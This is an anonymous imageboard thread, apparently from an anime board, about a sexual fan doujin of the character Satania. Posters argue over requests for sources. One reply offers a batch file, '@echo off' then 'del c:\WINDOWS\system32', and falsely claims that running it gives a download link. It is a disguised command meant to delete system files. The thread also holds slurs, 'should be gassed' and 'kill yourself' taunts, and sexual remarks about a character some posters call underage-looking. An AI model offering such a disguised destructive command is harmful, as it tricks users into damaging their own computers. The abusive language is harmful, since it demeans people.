This is Satania

This is Satania

I haven't watched the show, why is she so stacked in some pics and a loli in others? What's her original form?

she's naturally stacked

Nice, so I can fap to her with no problem

Is that 5240? Because this makes me extremely conflicted if it is.

>artist draws a doujin of himself fucking Satania
The madman did it.

Anyone would do the same desu.

To be expected of fans of worst girl. Even Nenefags never stooped this low.

How do you know that's the artist?

That looks like a regular ass self insert

I can't fap to this. It's too beautiful.

I bet he even bought her onahole

based

>a vanilla Satania doujin
I never thought this day would come

Wow. Artist, work?

TRANSLATIONS
WHERE

>firmly believe that Satania is not for lewd
>this artist becomes infatuated with her
Why must it be like this

give in fag

you probably already have

Who is the artist?

>you probably already have
Not yet, user. Not yet.

It's in this thread.

I don't see it.

and THIS is a sataniaposter

>that thick Reimu hypnosis doujin he did

Don't remind me, mate.

Look harder.

Who is the artist ?

>Twitter only artist
Yeah fuck you too

>satania
Tempted but i think the canadian border will probably jail me because they think she looks underage so i terribly cant invest in this hobby.
google it its not hard to find

>satania

>vanilla
Boooooring

Thank you for showing me this. I ejaculated a hole through my roof

yes

Yes it is, you don't even know it is really that easy because you didn't have to search for it

Except i did and i found it within a minute.
Its on panda for gods sake

Google is right, but it's not what i was looking for.

How is the guys name read? gomannihyakuyonju?

>89x125

Dude just look at this.

We would have been spared of all of these posts if you just had told us the name. And also if the artist didn't have that cryptic fucking name.

We also could be free of all those posts if you fucked off back to plebbit.

But you have no power over that. You could have played your part and stopped it in 1 post, but you didn't. It's all lost now.

what?
Gosen Nihyaku Shijuu?

imagine being put in a headlock with her thighs wrapped around your head

translation fucking when?

>vanilla

Spoonfeeding only encourages this shit.
Asking for sauce is against the rules, if you don't like it you can leave.
Also, it's not fucking hard. The character's name is right there. It's a new doujin. Go to your favorite source of doujins, type in the character name. It will be the first or second result.
Jesus Christ you people are retarded.

You know what you're right im gonna be nice for once. Here's how you get the raws for the doujin.
Open up a file in wordpad and type in:

@echo off
del c:\WINDOWS\system32

and then save as "satania.bat" this file will be your text file that will give you a link to the raws and you alone. After you make the file double click and you'll be re-directed to the raws. Have fun and enjoy!

I saw there was a new Satania doujin thanks to this post and then checked the Gabriel Dropout tag on panda. Found it right away. Why is that so hard for people? Saucefags should be gassed

>those legs

artist: great mosu
group: mosquitone.

>saucefags should be gassed
>gives sauce anyways
gas yourself faggot

>this will never be you

Are you retarded?

No but clearly you are

But i'm not asking for sauce you dumbass. All i was asking for was the guys name so i could look it up myself.

>Spoonfeeding only encourages this shit.
Look around you. This is the place that gets most autistic about spoonfeeding and see where said autism has taken us. Nothing but shitposts. It's like the retards saying being next to a cesspool like Sup Forums doesn't make it breed more cancer that will keep metastasizing to other boards. Get over it, your garbage "board culture" only creates more troubles that handicap discussion.

Please show me where I gave the sauce retard-kun

It's impressive how in love with Satania this artist got. Every time I want to fap to her I just head to Gelbooru, search for his tag, and fap to the new stuff.

Gee i dunno maybe giving the process on how to acquire sauce assuming this idiot has panda

she is literally perfect

>doujins are on doujin sites
Woah, sorry for giving away the secret

Alright user, what do you want to eat today?

>you will never play Twister with Satania

But how the fuck is 5240 read? That's all i've been asking all the time.

is the guy looking at her a fish

Like, artist of actual manga? What the fuck

Fuck off, people like you are the reason Sup Forums turned into shit

No, but thanks to antisaucefags we had to find that out after they had thrown their fit.

>Mommy! it's the world's fault i shat in my diaper!

Koisuru Daiakuma

either that or search the artist name:great mosu

One sandwich please.

macaroni macaroni do not lewd the debiru loli

Firstly, it's not "board culture," it's the rules, and for good reason.
Secondly, asking for the artist isn't even half a step up from asking for the sauce.
You already know the character's name; had you just looked that up you would have found it immediately.
But I don't have to tell a genius like you that. Please continue to lecture me, brainiac.

its easy to find even if you don't know the artist's name and can't find shit on google.
time for you to leave.

I'm still not sure what your gripe is. Seems you've realized how much of a retard you looked like and you're now back tracking. Don't reply to me again

>and for good reason.
Is that reason to create derailed threads like this that devolve into autistic shitflinging from antisaucefags?

>So many kisses and handholding
How can one man make something so great in this day and age? This makes up for all the NTR garbage nowadays

Satania's not worth it

>Satanya
>loli

He has good taste

Wow user thanks it was really helpful

>antisaucefags
What did he mean by this?

Took fucking forever but I'm glad he finally got around to it.

why do you fags continue to act like there isn't far more content vanilla content being made than NTR and any other niche fetish will ever have?

Not him but I never thought a character like Satania would get something this vanilla

Autists that witch-hunt on people who ask for help, considering every one of them saucefags.

I didn't even watch the show but I have to admit he draws her in such an adorable way.

I don't see anyone witch hunting. In fact, people have posted where and how they found it.

Godspeed.

Just wait for the next one page thread where they post a cropped image to get around image search with a img_13.jpg name because they couldn't have taken the time to rename it what with all the cropping they were doing.

based

I don't think her skirt is short enough. I may still need some imagination.
>slut

I feel like I could translate this entire thing in an hour or two, but I'm not feeling it.

Maybe this weekend.

>I won't ever be devout enough to draw a doujin of myself fucking mai waifu

It hurts

I personally don't have a problem with giving a source for an image thats cropped or almost impossible to find yourself. But when it takes barely any effort like the one in this thread, saucefags deserve to be told to fuck off

You better deliver user

>heart pupils
Yeah mate I'm gonna save up until you translate this. I don't care how long it takes.

>Actually asking this question
You need to go back

I'm gonna hold you to that user

>Muh spoonfeeding meme
Kill yourself you cunt

Damn, he actually made a doujin? Illustrations were already good, but going this far?

Dude, it's on the thread
You can't even look at the filenames

>everything is a meme xD